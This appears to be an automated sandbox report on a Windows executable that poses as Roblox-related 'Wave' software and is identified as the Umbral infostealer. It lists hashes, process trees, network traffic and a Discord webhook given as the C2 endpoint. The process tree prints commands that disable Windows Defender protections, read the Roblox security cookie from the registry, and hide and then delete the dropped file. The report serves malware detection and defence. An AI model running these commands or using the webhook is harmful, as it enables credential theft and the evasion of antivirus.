Analysis

  • max time kernel
    32s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    13/09/2024, 19:02 UTC

General

  • Target

    Wave/WaveWindows.exe

  • Size

    27.9MB

  • MD5

    2d0703acbed8003c7afa9f08f702f251

  • SHA1

    35181a175abe31f337f1d2ec83da735d70f327fe

  • SHA256

    147c4eb6a5c1235c21a1bed6f352eb257c15747309b618e993442f04a4e613f4

  • SHA512

    aefcfbeba017b7a56edce41a8ddcd4fd6b410819ae760cdf7990a3f2e9d16654ad5587e49678cdc97e9a8f9487a568721479b1fc52b12d9a7f639d1c6a4a4c02

  • SSDEEP

    786432:07vDACrv3Fqbq0ohQivGgPQEErUlqsAN50hO:07v0eqbVwQEG89EdN50hO

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1284109352877428746/ynYxJ7LoUnQYDiMVawzxesm3MoVdr_2vbNfl-vna_xyFrDmgWu6L7UCN0tMvtbReFJJ8

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Wave\WaveWindows.exe
    "C:\Users\Admin\AppData\Local\Temp\Wave\WaveWindows.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE
        "C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2684
    • C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2092
      • C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE
        "C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:572
    • C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1916
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE"
        3⤵
        • Views/modifies file attributes
        PID:2096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:908
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2260
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2724
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        PID:2604
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        PID:2620
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2636
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:2840
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE" && pause
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2084
        • C:\Windows\system32\PING.EXE
          ping localhost
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2900

      Network

      • DNS
        gstatic.com
        BOOTSTRAPPPER.EXE
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        216.58.204.67
      • GET
        https://gstatic.com/generate_204
        BOOTSTRAPPPER.EXE
        Remote address:
        216.58.204.67:443
        Request
        GET /generate_204 HTTP/1.1
        Host: gstatic.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 204 No Content
        Content-Length: 0
        Cross-Origin-Resource-Policy: cross-origin
        Date: Fri, 13 Sep 2024 19:03:57 GMT
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • DNS
        ip-api.com
        BOOTSTRAPPPER.EXE
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • GET
        http://ip-api.com/line/?fields=hosting
        BOOTSTRAPPPER.EXE
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Fri, 13 Sep 2024 19:03:57 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 3
        X-Rl: 42
      • GET
        http://ip-api.com/json/?fields=225545
        BOOTSTRAPPPER.EXE
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Fri, 13 Sep 2024 19:04:01 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 161
        Access-Control-Allow-Origin: *
        X-Ttl: 27
        X-Rl: 42
      • DNS
        discord.com
        BOOTSTRAPPPER.EXE
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.137.232
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.128.233
      • 216.58.204.67:443
        https://gstatic.com/generate_204
        tls, http
        BOOTSTRAPPPER.EXE
        945 B
        4.8kB
        11
        10

        HTTP Request

        GET https://gstatic.com/generate_204

        HTTP Response

        204
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        BOOTSTRAPPPER.EXE
        310 B
        266 B
        5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        BOOTSTRAPPPER.EXE
        380 B
        510 B
        6
        4

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.135.232:443
        discord.com
        tls
        BOOTSTRAPPPER.EXE
        391 B
        219 B
        6
        5
      • 8.8.8.8:53
        gstatic.com
        dns
        BOOTSTRAPPPER.EXE
        57 B
        73 B
        1
        1

        DNS Request

        gstatic.com

        DNS Response

        216.58.204.67

      • 8.8.8.8:53
        ip-api.com
        dns
        BOOTSTRAPPPER.EXE
        56 B
        72 B
        1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        discord.com
        dns
        BOOTSTRAPPPER.EXE
        57 B
        137 B
        1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.135.232
        162.159.136.232
        162.159.137.232
        162.159.138.232
        162.159.128.233

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE

        Filesize

        17.2MB

        MD5

        43d964429554f10cd2998d9e2f3b6d2c

        SHA1

        d5310c347472b521934d05b78a3475eb9d98af88

        SHA256

        61d2874397de398da38e6dbae1317b8d555e4251dd274c28abaa24b146db920d

        SHA512

        e624f31322c4e0ac8d29913f5cad2dad6543afce03403b527169e4e03da6950b572ecaa757cb037fb97dc9abde3bcc56d46863a6bdca24b108e5193cc1f48ed4

      • C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE

        Filesize

        229KB

        MD5

        86e5ff4fe7928b5c8937d44e39898936

        SHA1

        9af8d86ebbcc235c5d39dc77f3adc7199bb46ee8

        SHA256

        f73aa033b6381ec36324947f613a7990af13f0c32cc217403fbf3d741b35b311

        SHA512

        c01f2061db11101fca739406f4a679c163d6c55fa76222e409388735db7d07bc550feccd2122d3d7f4cf19766969e3e4363bdd56330161a30ce7823c68d490e4

      • C:\Users\Admin\AppData\Local\Temp\_MEI20922\python310.dll

        Filesize

        4.2MB

        MD5

        384349987b60775d6fc3a6d202c3e1bd

        SHA1

        701cb80c55f859ad4a31c53aa744a00d61e467e5

        SHA256

        f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

        SHA512

        6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-file-l1-2-0.dll

        Filesize

        21KB

        MD5

        1c58526d681efe507deb8f1935c75487

        SHA1

        0e6d328faf3563f2aae029bc5f2272fb7a742672

        SHA256

        ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

        SHA512

        8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-file-l2-1-0.dll

        Filesize

        18KB

        MD5

        bfffa7117fd9b1622c66d949bac3f1d7

        SHA1

        402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

        SHA256

        1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

        SHA512

        b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-localization-l1-2-0.dll

        Filesize

        21KB

        MD5

        724223109e49cb01d61d63a8be926b8f

        SHA1

        072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

        SHA256

        4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

        SHA512

        19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-processthreads-l1-1-1.dll

        Filesize

        21KB

        MD5

        517eb9e2cb671ae49f99173d7f7ce43f

        SHA1

        4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

        SHA256

        57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

        SHA512

        492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-timezone-l1-1-0.dll

        Filesize

        21KB

        MD5

        d12403ee11359259ba2b0706e5e5111c

        SHA1

        03cc7827a30fd1dee38665c0cc993b4b533ac138

        SHA256

        f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

        SHA512

        9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\python310.dll

        Filesize

        1.4MB

        MD5

        90d5b8ba675bbb23f01048712813c746

        SHA1

        f2906160f9fc2fa719fea7d37e145156742ea8a7

        SHA256

        3a7d497d779ff13082835834a1512b0c11185dd499ab86be830858e7f8aaeb3e

        SHA512

        872c2bf56c3fe180d9b4fb835a92e1dc188822e9d9183aab34b305408bb82fba1ead04711e8ad2bef1534e86cd49f2445d728851206d7899c1a7a83e5a62058e

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\ucrtbase.dll

        Filesize

        992KB

        MD5

        0e0bac3d1dcc1833eae4e3e4cf83c4ef

        SHA1

        4189f4459c54e69c6d3155a82524bda7549a75a6

        SHA256

        8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

        SHA512

        a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        6b4189fd7bae508015035ab6d42291ad

        SHA1

        5433ec09574d5908f38727bc2e0a759acdeb4438

        SHA256

        86bfa7ca416890d61e267c47ab4276b5adda136d281657c42cf2802090328ff2

        SHA512

        f82204b3c4dbc22ddd4df095c74681cb5515409defc2ec87dbf1c91e8ee61106f6a3821bc7af2924b15acea1ca0566108099a312ad899693662b8ffccc5e849b

      • \Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE

        Filesize

        10.2MB

        MD5

        e04bf3d008e9ace5c8abe6b9abcf4620

        SHA1

        2b0e7f4650cf2c92dab7dc6dac458f4dd7f86bfc

        SHA256

        8d211399d7b30b3a7326d550d2883cc229f9ca7dfd77af64a5dc4dc44129e103

        SHA512

        b0cc844172ca6eec8464908066f085b122f467e93f1cd0e850a8e69e7a356e89b7255f50e873073e815b48c9124a30463247a6a20e2bd34d69963f3cf42731ec

      • memory/908-272-0x000000001B750000-0x000000001BA32000-memory.dmp

        Filesize

        2.9MB

      • memory/908-273-0x0000000002410000-0x0000000002418000-memory.dmp

        Filesize

        32KB

      • memory/1804-252-0x0000000000880000-0x00000000008C0000-memory.dmp

        Filesize

        256KB

      • memory/2636-308-0x000000001B700000-0x000000001B9E2000-memory.dmp

        Filesize

        2.9MB

      • memory/2636-309-0x0000000001E80000-0x0000000001E88000-memory.dmp

        Filesize

        32KB

      • memory/2684-106-0x000007FEF6930000-0x000007FEF6D95000-memory.dmp

        Filesize

        4.4MB

      • memory/2684-313-0x000007FEF6930000-0x000007FEF6D95000-memory.dmp

        Filesize

        4.4MB

      • memory/2988-279-0x000000001B550000-0x000000001B832000-memory.dmp

        Filesize

        2.9MB

      • memory/2988-280-0x0000000001D70000-0x0000000001D78000-memory.dmp

        Filesize

        32KB
